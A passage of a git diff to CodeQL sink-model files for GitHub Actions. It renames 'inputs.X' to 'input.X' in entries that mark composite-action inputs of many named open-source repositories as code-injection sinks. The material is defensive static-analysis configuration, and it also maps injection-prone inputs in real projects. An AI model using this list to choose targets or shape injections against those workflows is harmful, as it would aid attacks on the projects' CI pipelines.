b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 745f89d8677..12deff387bd 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] - - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file + - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index a732e2fac3f..9c3c242b1ed 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 1aebd1199a5..4aa1ce5c4cf 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file + - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 708adf528f2..6f8ef16ea33 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 18c02da4443..bc2146921ef 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index c0a44fae749..eabd3834b1b 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file + - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index af0f474bfae..2253e33b950 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 731ecd5ab1b..bc1eb54056a 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] - - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] - - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index ca4dc84bbfc..842240cfaa2 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index caa6432efa9..8ff5ee1e2c0 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] - - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file + - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index a2e78841f69..29c5f793fb2 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file + - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index fbb76ae46e8..2f12293df0e 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] - - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] - - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file + - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 23d001db673..83012e51335 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] - - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file + - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 94c7adf250a..8ca21196194 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 85632a06a75..7f19fd1f6a6 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file + - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 9f002168214..1889fcff144 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f1191e5c1c6..f8243352f45 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] - - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] - - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index b0e30669c2e..bd2015a7096 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index e26f0a886d9..501123a82fe 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file + - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 4b40b2fda8a..1a17e3db2b8 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 06b6e37ea1c..a125a4bfa8c 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file + - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index dab53d9d5a3..e8d0cc64792 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file + - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index ce485e688f2..736c84b68cc 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file + - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index ab1cac6b691..acb5d462d15 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 82d69349e3a..aedeb4e1023 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 13a6bfe9233..0d8afb086c9 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 163abb26185..4756acbf306 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 3be0de43329..a0e4acec75a 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 2b0b84e172b..6acfcf9773f 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index ba213f0363b..7e0deeea906 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] - - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d93b946f3d7..18678fe9ecd 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] - - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] - - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 40adbe1fc29..d9d492f79cd 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file + - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 293d8a832bd..d3046ff1fc4 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file + - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index c72000641ce..845fba40a6c 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] - - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] - - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file + - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 53929ab8ed1..bcf51805710 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ 